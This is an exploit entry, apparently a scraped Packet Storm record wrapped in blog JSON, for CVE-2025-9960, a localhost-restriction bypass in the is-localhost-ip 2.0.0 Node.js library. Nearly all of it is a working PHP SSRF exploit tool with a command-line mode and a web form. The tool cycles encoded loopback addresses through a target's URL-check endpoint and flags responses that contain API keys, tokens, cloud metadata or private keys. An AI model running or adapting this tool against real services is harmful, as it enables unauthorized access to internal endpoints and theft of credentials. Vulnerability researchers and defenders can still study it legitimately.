{“lastseen”:”2025-12-10T17:38:27″,”description”:”is-localhost-ip version 2.0.0 suffers from a restriction bypass vulnerability…”,”published”:”2025-12-10T00:00:00″,”modified”:”2025-12-10T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 is-localhost-ip 2.0.0 Restriction Bypass”,”source”:””,”references”:””,”id”:”PACKETSTORM:212666″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-9960″],”sourceData”:”=============================================================================================================================================\\n | # Title : is-localhost-ip 2.0.0 Restriction Bypass |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : https:\/\/github.com\/tinovyatkin\/is-localhost-ip |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/211369\/ \\u0026\\tCVE-2025-9960\\n \\n [+] Summary : is-localhost-ip (v2.0.0) is a compact, dependency\u2011free JavaScript library (~100 LOC) designed to determine whether a given hostname or IPv4\/IPv6 address refers to the local machine\\n The vulnerability does not affect the browser or the operating system.\\n It affects the application layer, specifically Node.js applications that rely on the is-localhost-ip library for SSRF protection.\\n \\n Any Node.js (commonly Express.js) service that imports and uses:\\n \\n const isLocalhost = require(\\”is-localhost-ip\\”);\\n \\n to block loopback access can be bypassed due to incomplete IPv6\u2011mapped address handling.\\n \\n So the impacted target is:\\n \\n Node.js application (e.g., Express server) using is-localhost-ip v2.0.0\\n \\n Not:\\n \\n \u274c Browser\\n \u274c Operating system\\n \\n But:\\n \\n \u2714 Node.js application using the library\\n \\n [+] POC : * Usage: php exploit.php –target=http:\/\/victim.com:3005\\n \\n \\u003c?php\\n \/**\\n * SSRF Exploit for is-localhost-ip 2.0.0\\n * Author: indoushka\\n *\/\\n \\n class SSRFExploit {\\n private $target;\\n private $internalEndpoint;\\n private $timeout = 10;\\n \\n \/\/ \u062c\u0645\u064a\u0639 \u0645\u062a\u063a\u064a\u0631\u0627\u062a localhost \u0627\u0644\u0645\u062d\u062a\u0645\u0644\u0629\\n private $localhostVariants = [\\n \/\/ IPv4 standard\\n ‘127.0.0.1’,\\n ‘127.0.0.01’,\\n ‘127.000.000.001’,\\n \\n \/\/ Hexadecimal\\n ‘0x7f000001’,\\n \\n \/\/ Decimal\\n ‘2130706433’,\\n \\n \/\/ Octal\\n ‘0177.0.0.01’,\\n ‘0177.000.000.001’,\\n \\n \/\/ IPv6\\n ‘[::1]’,\\n ‘[::ffff:127.0.0.1]’,\\n ‘[::ffff:7f00:1]’,\\n ‘[0:0:0:0:0:ffff:7f00:1]’,\\n \\n \/\/ Shortened forms\\n ‘127.1’,\\n ‘127.0.1’,\\n \\n \/\/ DNS\\n ‘localhost’,\\n ‘local’,\\n ‘loopback’,\\n ‘ip6-localhost’,\\n \\n \/\/ Word variations\\n ‘localtest.me’,\\n ‘localtest’,\\n ‘127.0.0.1.nip.io’,\\n ‘127-0-0-1.nip.io’,\\n ];\\n \\n public function __construct($target, $internalEndpoint = ‘\/secret’) {\\n $this-\\u003etarget = rtrim($target, ‘\/’);\\n $this-\\u003einternalEndpoint = $internalEndpoint;\\n }\\n \\n \/**\\n * \u0627\u062e\u062a\u0628\u0627\u0631 \u062c\u0645\u064a\u0639 \u0627\u0644\u0645\u062a\u063a\u064a\u0631\u0627\u062a\\n *\/\\n public function testAllVariants() {\\n echo \\” Starting SSRF Exploit against: {$this-\\u003etarget}\\\\n\\”;\\n echo \\” Testing localhost bypass variants…\\\\n\\”;\\n echo str_repeat(\\”=\\”, 80) . \\”\\\\n\\”;\\n \\n $results = [];\\n $successCount = 0;\\n \\n foreach ($this-\\u003elocalhostVariants as $variant) {\\n $result = $this-\\u003etestVariant($variant);\\n $results[] = $result;\\n \\n if ($result[‘success’]) {\\n $successCount++;\\n echo \\” SUCCESS: {$variant}\\\\n\\”;\\n echo \\” Response: \\” . substr($result[‘response’], 0, 200) . \\”…\\\\n\\”;\\n echo \\” Full URL: {$result[‘url’]}\\\\n\\”;\\n echo str_repeat(\\”-\\”, 80) . \\”\\\\n\\”;\\n } else {\\n echo \\” FAILED: {$variant}\\\\n\\”;\\n echo \\” Reason: {$result[‘error’]}\\\\n\\”;\\n echo str_repeat(\\”-\\”, 80) . \\”\\\\n\\”;\\n }\\n \\n \/\/ \u062a\u0623\u062e\u064a\u0631 \u0642\u0635\u064a\u0631 \u0644\u062a\u062c\u0646\u0628 \u0627\u0644\u062d\u0638\u0631\\n usleep(500000); \/\/ 0.5 \u062b\u0627\u0646\u064a\u0629\\n }\\n \\n \/\/ \u0639\u0631\u0636 \u0627\u0644\u0646\u062a\u0627\u0626\u062c\\n $this-\\u003eshowResults($results, $successCount);\\n \\n \/\/ \u062d\u0641\u0638 \u0627\u0644\u0646\u062a\u0627\u0626\u062c \u0641\u064a \u0645\u0644\u0641\\n $this-\\u003esaveResults($results);\\n \\n return $results;\\n }\\n \\n \/**\\n * \u0627\u062e\u062a\u0628\u0627\u0631 \u0645\u062a\u063a\u064a\u0631 \u0645\u0639\u064a\u0646\\n *\/\\n private function testVariant($variant) {\\n $port = 3005; \/\/ \u0627\u0644\u0645\u0646\u0641\u0630 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\\n $testUrl = \\”http:\/\/{$variant}:{$port}{$this-\\u003einternalEndpoint}\\”;\\n $encodedUrl = urlencode($testUrl);\\n $attackUrl = \\”{$this-\\u003etarget}\/check-url?url={$encodedUrl}\\”;\\n \\n try {\\n $ch = curl_init();\\n \\n curl_setopt_array($ch, [\\n CURLOPT_URL =\\u003e $attackUrl,\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_TIMEOUT =\\u003e $this-\\u003etimeout,\\n CURLOPT_FOLLOWLOCATION =\\u003e false,\\n CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n CURLOPT_SSL_VERIFYHOST =\\u003e false,\\n CURLOPT_USERAGENT =\\u003e ‘Mozilla\/5.0 (SSRF-Test)’,\\n CURLOPT_HTTPHEADER =\\u003e [\\n ‘Accept: application\/json,text\/html’,\\n ‘X-Forwarded-For: 127.0.0.1’,\\n ],\\n ]);\\n \\n $response = curl_exec($ch);\\n $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n $error = curl_error($ch);\\n curl_close($ch);\\n \\n if ($error) {\\n return [\\n ‘variant’ =\\u003e $variant,\\n ‘success’ =\\u003e false,\\n ‘error’ =\\u003e \\”CURL Error: {$error}\\”,\\n ‘url’ =\\u003e $attackUrl,\\n ‘http_code’ =\\u003e 0,\\n ‘response’ =\\u003e ”\\n ];\\n }\\n \\n if ($httpCode === 403) {\\n return [\\n ‘variant’ =\\u003e $variant,\\n ‘success’ =\\u003e false,\\n ‘error’ =\\u003e \\”Blocked (403 Forbidden)\\”,\\n ‘url’ =\\u003e $attackUrl,\\n ‘http_code’ =\\u003e $httpCode,\\n ‘response’ =\\u003e $response\\n ];\\n }\\n \\n if ($httpCode === 200) {\\n \/\/ \u062a\u062d\u0642\u0642 \u0625\u0630\u0627 \u0643\u0627\u0646 \u0627\u0644\u0631\u062f \u064a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u0628\u064a\u0627\u0646\u0627\u062a \u062d\u0633\u0627\u0633\u0629\\n $isSensitive = $this-\\u003echeckSensitiveData($response);\\n \\n return [\\n ‘variant’ =\\u003e $variant,\\n ‘success’ =\\u003e $isSensitive,\\n ‘error’ =\\u003e $isSensitive ? \\”\\” : \\”200 OK but no sensitive data\\”,\\n ‘url’ =\\u003e $attackUrl,\\n ‘http_code’ =\\u003e $httpCode,\\n ‘response’ =\\u003e $response,\\n ‘sensitive’ =\\u003e $isSensitive\\n ];\\n }\\n \\n return [\\n ‘variant’ =\\u003e $variant,\\n ‘success’ =\\u003e false,\\n ‘error’ =\\u003e \\”HTTP {$httpCode}\\”,\\n ‘url’ =\\u003e $attackUrl,\\n ‘http_code’ =\\u003e $httpCode,\\n ‘response’ =\\u003e $response\\n ];\\n \\n } catch (Exception $e) {\\n return [\\n ‘variant’ =\\u003e $variant,\\n ‘success’ =\\u003e false,\\n ‘error’ =\\u003e \\”Exception: \\” . $e-\\u003egetMessage(),\\n ‘url’ =\\u003e $attackUrl,\\n ‘http_code’ =\\u003e 0,\\n ‘response’ =\\u003e ”\\n ];\\n }\\n }\\n \\n \/**\\n * \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0648\u062c\u0648\u062f \u0628\u064a\u0627\u0646\u0627\u062a \u062d\u0633\u0627\u0633\u0629 \u0641\u064a \u0627\u0644\u0631\u062f\\n *\/\\n private function checkSensitiveData($response) {\\n $sensitivePatterns = [\\n ‘\/apikey\/i’,\\n ‘\/secret\/i’,\\n ‘\/token\/i’,\\n ‘\/password\/i’,\\n ‘\/key\/i’,\\n ‘\/private\/i’,\\n ‘\/aws\/i’,\\n ‘\/azure\/i’,\\n ‘\/gcp\/i’,\\n ‘\/metadata\/i’,\\n ‘\/admin\/i’,\\n ‘\/credential\/i’,\\n ‘\/jwt\/i’,\\n ‘\/bearer\/i’,\\n ‘\/ssh\/i’,\\n ‘\/rsa\/i’,\\n ‘\/BEGIN.*PRIVATE.*KEY\/i’,\\n ];\\n \\n foreach ($sensitivePatterns as $pattern) {\\n if (preg_match($pattern, $response)) {\\n return true;\\n }\\n }\\n \\n \/\/ \u062a\u062d\u0642\u0642 \u0645\u0646 JSON \u064a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u0645\u0641\u0627\u062a\u064a\u062d \u062d\u0633\u0627\u0633\u0629\\n if ($this-\\u003eisJson($response)) {\\n $data = json_decode($response, true);\\n if (is_array($data)) {\\n $sensitiveKeys = [‘apikey’, ‘secret’, ‘token’, ‘password’, ‘key’];\\n foreach ($sensitiveKeys as $key) {\\n if (isset($data[$key])) {\\n return true;\\n }\\n }\\n }\\n }\\n \\n return false;\\n }\\n \\n \/**\\n * \u0627\u0644\u062a\u062d\u0642\u0642 \u0625\u0630\u0627 \u0643\u0627\u0646 \u0627\u0644\u0646\u0635 JSON\\n *\/\\n private function isJson($string) {\\n json_decode($string);\\n return json_last_error() === JSON_ERROR_NONE;\\n }\\n \\n \/**\\n * \u0639\u0631\u0636 \u0627\u0644\u0646\u062a\u0627\u0626\u062c \u0627\u0644\u0646\u0647\u0627\u0626\u064a\u0629\\n *\/\\n private function showResults($results, $successCount) {\\n echo \\”\\\\n\\” . str_repeat(\\”=\\”, 80) . \\”\\\\n\\”;\\n echo \\” EXPLOIT RESULTS SUMMARY\\\\n\\”;\\n echo str_repeat(\\”=\\”, 80) . \\”\\\\n\\”;\\n echo \\”Target: {$this-\\u003etarget}\\\\n\\”;\\n echo \\”Total Variants Tested: \\” . count($results) . \\”\\\\n\\”;\\n echo \\”Successful Bypasses: {$successCount}\\\\n\\”;\\n echo \\”Blocked\/Failed: \\” . (count($results) – $successCount) . \\”\\\\n\\”;\\n echo str_repeat(\\”-\\”, 80) . \\”\\\\n\\”;\\n \\n if ($successCount \\u003e 0) {\\n echo \\” VULNERABILITY CONFIRMED!\\\\n\\”;\\n echo \\” SSRF Bypass Successful\\\\n\\\\n\\”;\\n \\n echo \\”Successful Variants:\\\\n\\”;\\n foreach ($results as $result) {\\n if ($result[‘success’]) {\\n echo \\” \u2022 {$result[‘variant’]}\\\\n\\”;\\n echo \\” URL: {$result[‘url’]}\\\\n\\”;\\n echo \\” Response Preview: \\” . substr($result[‘response’], 0, 100) . \\”…\\\\n\\\\n\\”;\\n }\\n }\\n } else {\\n echo \\” Target appears to be protected\\\\n\\”;\\n echo \\” No successful bypasses found\\\\n\\”;\\n }\\n }\\n \\n \/**\\n * \u062d\u0641\u0638 \u0627\u0644\u0646\u062a\u0627\u0626\u062c \u0641\u064a \u0645\u0644\u0641\\n *\/\\n private function saveResults($results) {\\n $filename = ‘ssrf_results_’ . date(‘Y-m-d_H-i-s’) . ‘.txt’;\\n $content = \\”SSRF Exploit Results\\\\n\\”;\\n $content .= \\”Target: {$this-\\u003etarget}\\\\n\\”;\\n $content .= \\”Time: \\” . date(‘Y-m-d H:i:s’) . \\”\\\\n\\\\n\\”;\\n \\n foreach ($results as $result) {\\n $content .= str_repeat(\\”-\\”, 60) . \\”\\\\n\\”;\\n $content .= \\”Variant: {$result[‘variant’]}\\\\n\\”;\\n $content .= \\”Success: \\” . ($result[‘success’] ? ‘YES’ : ‘NO’) . \\”\\\\n\\”;\\n $content .= \\”HTTP Code: {$result[‘http_code’]}\\\\n\\”;\\n $content .= \\”Error: {$result[‘error’]}\\\\n\\”;\\n $content .= \\”URL: {$result[‘url’]}\\\\n\\”;\\n $content .= \\”Response:\\\\n{$result[‘response’]}\\\\n\\\\n\\”;\\n }\\n \\n file_put_contents($filename, $content);\\n echo \\”\ud83d\udcc4 Results saved to: {$filename}\\\\n\\”;\\n }\\n \\n \/**\\n * \u0647\u062c\u0648\u0645 \u0645\u062a\u0642\u062f\u0645 \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 IP \u0627\u0644\u0645\u062f\u062e\u0644 \u0645\u0646 \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645\\n *\/\\n public function customAttack($customIp, $port = 3005, $endpoint = ‘\/secret’) {\\n echo \\” Custom Attack with IP: {$customIp}\\\\n\\”;\\n \\n $variants = [\\n $customIp,\\n $this-\\u003edecimalToIp($customIp),\\n $this-\\u003eipToHex($customIp),\\n $this-\\u003eipToOctal($customIp),\\n \\”[::ffff:\\” . $this-\\u003eipv4ToHex($customIp) . \\”]\\”,\\n ];\\n \\n foreach ($variants as $variant) {\\n echo \\”\\\\nTesting variant: {$variant}\\\\n\\”;\\n $result = $this-\\u003etestVariant($variant);\\n \\n if ($result[‘success’]) {\\n echo \\” SUCCESS!\\\\n\\”;\\n echo \\”Response: \\” . substr($result[‘response’], 0, 200) . \\”\\\\n\\”;\\n return $result;\\n }\\n }\\n \\n echo \\” All variants failed\\\\n\\”;\\n return false;\\n }\\n \\n \/**\\n * \u062a\u062d\u0648\u064a\u0644 IP \u0625\u0644\u0649 \u062a\u0645\u062b\u064a\u0644 \u0639\u0634\u0631\u064a\\n *\/\\n private function ipToDecimal($ip) {\\n $parts = explode(‘.’, $ip);\\n if (count($parts) !== 4) return $ip;\\n \\n return ($parts[0] * 16777216) + \\n ($parts[1] * 65536) + \\n ($parts[2] * 256) + \\n $parts[3];\\n }\\n \\n \/**\\n * \u062a\u062d\u0648\u064a\u0644 IP \u0625\u0644\u0649 \u0633\u062f\u0627\u0633\u064a \u0639\u0634\u0631\u064a\\n *\/\\n private function ipToHex($ip) {\\n $decimal = $this-\\u003eipToDecimal($ip);\\n return ‘0x’ . dechex($decimal);\\n }\\n \\n \/**\\n * \u062a\u062d\u0648\u064a\u0644 IP \u0625\u0644\u0649 \u062b\u0645\u0627\u0646\u064a\\n *\/\\n private function ipToOctal($ip) {\\n $parts = explode(‘.’, $ip);\\n if (count($parts) !== 4) return $ip;\\n \\n $octalParts = array_map(function($part) {\\n return ‘0’ . decoct($part);\\n }, $parts);\\n \\n return implode(‘.’, $octalParts);\\n }\\n \\n \/**\\n * \u062a\u062d\u0648\u064a\u0644 \u0639\u0634\u0631\u064a \u0625\u0644\u0649 IP\\n *\/\\n private function decimalToIp($decimal) {\\n return long2ip($decimal);\\n }\\n \\n \/**\\n * \u062a\u062d\u0648\u064a\u0644 IPv4 \u0625\u0644\u0649 \u0633\u062f\u0627\u0633\u064a \u0639\u0634\u0631\u064a \u0644\u0640 IPv6\\n *\/\\n private function ipv4ToHex($ip) {\\n $parts = explode(‘.’, $ip);\\n if (count($parts) !== 4) return $ip;\\n \\n $hexParts = array_map(function($part) {\\n return str_pad(dechex($part), 2, ‘0’, STR_PAD_LEFT);\\n }, $parts);\\n \\n return implode(”, $hexParts);\\n }\\n }\\n \\n \/**\\n * \u062f\u0627\u0644\u0629 CLI \u0644\u0644\u0645\u0633\u0627\u0639\u062f\u0629\\n *\/\\n function showHelp() {\\n echo \\”SSRF Exploit Tool for is-localhost-ip 2.0.0\\\\n\\”;\\n echo \\”Usage:\\\\n\\”;\\n echo \\” php exploit.php –target=http:\/\/victim.com:3005\\\\n\\”;\\n echo \\” php exploit.php –target=http:\/\/victim.com:3005 –custom=127.0.0.1\\\\n\\”;\\n echo \\” php exploit.php –target=http:\/\/victim.com:3005 –endpoint=\/admin\\\\n\\”;\\n echo \\” php exploit.php –help\\\\n\\\\n\\”;\\n echo \\”Options:\\\\n\\”;\\n echo \\” –target Target URL (required)\\\\n\\”;\\n echo \\” –custom Custom IP to test\\\\n\\”;\\n echo \\” –endpoint Internal endpoint to access (default: \/secret)\\\\n\\”;\\n echo \\” –port Port number (default: 3005)\\\\n\\”;\\n echo \\” –help Show this help\\\\n\\”;\\n }\\n \\n \/**\\n * \u0627\u0644\u0645\u0639\u0627\u0644\u062c\u0629 \u0645\u0646 \u0633\u0637\u0631 \u0627\u0644\u0623\u0648\u0627\u0645\u0631\\n *\/\\n if (PHP_SAPI === ‘cli’) {\\n $options = getopt(”, [‘target:’, ‘custom:’, ‘endpoint:’, ‘port:’, ‘help’]);\\n \\n if (isset($options[‘help’]) || !isset($options[‘target’])) {\\n showHelp();\\n exit();\\n }\\n \\n $target = $options[‘target’];\\n $endpoint = $options[‘endpoint’] ?? ‘\/secret’;\\n $port = $options[‘port’] ?? 3005;\\n \\n $exploit = new SSRFExploit($target, $endpoint);\\n \\n if (isset($options[‘custom’])) {\\n \/\/ \u0647\u062c\u0648\u0645 \u0645\u062e\u0635\u0635\\n $customIp = $options[‘custom’];\\n $exploit-\\u003ecustomAttack($customIp, $port, $endpoint);\\n } else {\\n \/\/ \u0627\u062e\u062a\u0628\u0627\u0631 \u062c\u0645\u064a\u0639 \u0627\u0644\u0645\u062a\u063a\u064a\u0631\u0627\u062a\\n $exploit-\\u003etestAllVariants();\\n }\\n } else {\\n \/\/ \u0648\u0627\u062c\u0647\u0629 \u0648\u064a\u0628 \u0628\u0633\u064a\u0637\u0629\\n ?\\u003e\\n \\u003c!DOCTYPE html\\u003e\\n \\u003chtml\\u003e\\n \\u003chead\\u003e\\n \\u003ctitle\\u003eSSRF Exploit Tester\\u003c\/title\\u003e\\n \\u003cstyle\\u003e\\n body { font-family: Arial, sans-serif; margin: 40px; }\\n .container { max-width: 800px; margin: auto; }\\n .form-group { margin-bottom: 15px; }\\n label { display: block; margin-bottom: 5px; font-weight: bold; }\\n input[type=\\”text\\”] { width: 100%; padding: 8px; border: 1px solid #ddd; }\\n button { background: #007bff; color: white; border: none; padding: 10px 20px; cursor: pointer; }\\n .result { margin-top: 20px; padding: 15px; background: #f8f9fa; border-left: 4px solid #007bff; }\\n .success { border-color: #28a745; background: #d4edda; }\\n .error { border-color: #dc3545; background: #f8d7da; }\\n \\u003c\/style\\u003e\\n \\u003c\/head\\u003e\\n \\u003cbody\\u003e\\n \\u003cdiv class=\\”container\\”\\u003e\\n \\u003ch1\\u003e SSRF Exploit Tester\\u003c\/h1\\u003e\\n \\u003cp\\u003eTest for CVE-2025-9960 (is-localhost-ip bypass)\\u003c\/p\\u003e\\n \\n \\u003cform method=\\”POST\\”\\u003e\\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”target\\”\\u003eTarget URL:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”target\\” name=\\”target\\” \\n placeholder=\\”http:\/\/victim.com:3005\\” required\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”endpoint\\”\\u003eInternal Endpoint:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”endpoint\\” name=\\”endpoint\\” \\n value=\\”\/secret\\” placeholder=\\”\/admin, \/internal, etc.\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”custom\\”\\u003eCustom IP (optional):\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”custom\\” name=\\”custom\\” \\n placeholder=\\”127.0.0.1, 192.168.1.1, etc.\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cbutton type=\\”submit\\” name=\\”test\\”\\u003eTest SSRF\\u003c\/button\\u003e\\n \\u003cbutton type=\\”submit\\” name=\\”quick\\”\\u003eQuick Test\\u003c\/button\\u003e\\n \\u003c\/form\\u003e\\n \\n \\u003c?php\\n if ($_SERVER[‘REQUEST_METHOD’] === ‘POST’) {\\n $target = $_POST[‘target’] ?? ”;\\n $endpoint = $_POST[‘endpoint’] ?? ‘\/secret’;\\n $customIp = $_POST[‘custom’] ?? ”;\\n \\n if (!empty($target)) {\\n $exploit = new SSRFExploit($target, $endpoint);\\n \\n echo ‘\\u003cdiv class=\\”result\\”\\u003e’;\\n echo ‘\\u003ch3\\u003eTest Results:\\u003c\/h3\\u003e’;\\n \\n if (isset($_POST[‘quick’])) {\\n \/\/ \u0627\u062e\u062a\u0628\u0627\u0631 \u0633\u0631\u064a\u0639\\n echo ‘\\u003cp\\u003ePerforming quick test…\\u003c\/p\\u003e’;\\n $quickVariants = [‘127.0.0.1’, ‘0x7f000001’, ‘2130706433’, ‘[::ffff:7f00:1]’];\\n \\n foreach ($quickVariants as $variant) {\\n $result = $exploit-\\u003etestVariant($variant);\\n echo $result[‘success’] \\n ? \\”\\u003cp class=’success’\\u003e {$variant}: SUCCESS\\u003c\/p\\u003e\\”\\n : \\”\\u003cp class=’error’\\u003e {$variant}: FAILED\\u003c\/p\\u003e\\”;\\n }\\n } else {\\n \/\/ \u0627\u062e\u062a\u0628\u0627\u0631 \u0643\u0627\u0645\u0644\\n $results = $exploit-\\u003etestAllVariants();\\n }\\n \\n echo ‘\\u003c\/div\\u003e’;\\n }\\n }\\n ?\\u003e\\n \\n \\u003cdiv class=\\”result\\”\\u003e\\n \\u003ch4\\u003e About This Exploit:\\u003c\/h4\\u003e\\n \\u003cp\\u003eThis tool demonstrates SSRF bypass in is-localhost-ip v2.0.0\\u003c\/p\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eCVE:\\u003c\/strong\\u003e CVE-2025-9960\\u003c\/p\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eVulnerability:\\u003c\/strong\\u003e Server-Side Request Forgery via localhost restriction bypass\\u003c\/p\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eTest Variants:\\u003c\/strong\\u003e 20+ localhost representations\\u003c\/p\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eUse Responsibly:\\u003c\/strong\\u003e Only test on systems you own or have permission to test\\u003c\/p\\u003e\\n \\u003c\/div\\u003e\\n \\u003c\/div\\u003e\\n \\u003c\/body\\u003e\\n \\u003c\/html\\u003e\\n \\u003c?php\\n }\\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212666″,”cvss”:{“score”:6.9,”severity”:”MEDIUM”,”vector”:”CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:N\/UI:N\/VC:N\/SC:N\/VI:L\/SI:N\/VA:N\/SA:N”,”version”:”4.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212666\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-10T17:38:27″,”description”:”is-localhost-ip version 2.0.0 suffers from a restriction bypass vulnerability…”,”published”:”2025-12-10T00:00:00″,”modified”:”2025-12-10T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 is-localhost-ip 2.0.0 Restriction Bypass”,”source”:””,”references”:””,”id”:”PACKETSTORM:212666″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-9960″],”sourceData”:”=============================================================================================================================================\\n | # Title : is-localhost-ip 2.0.0 Restriction Bypass |\\n | # Author…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,48,12,21,13,53,7,11,5],"class_list":["post-30056","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-69","tag-exploit","tag-medium","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n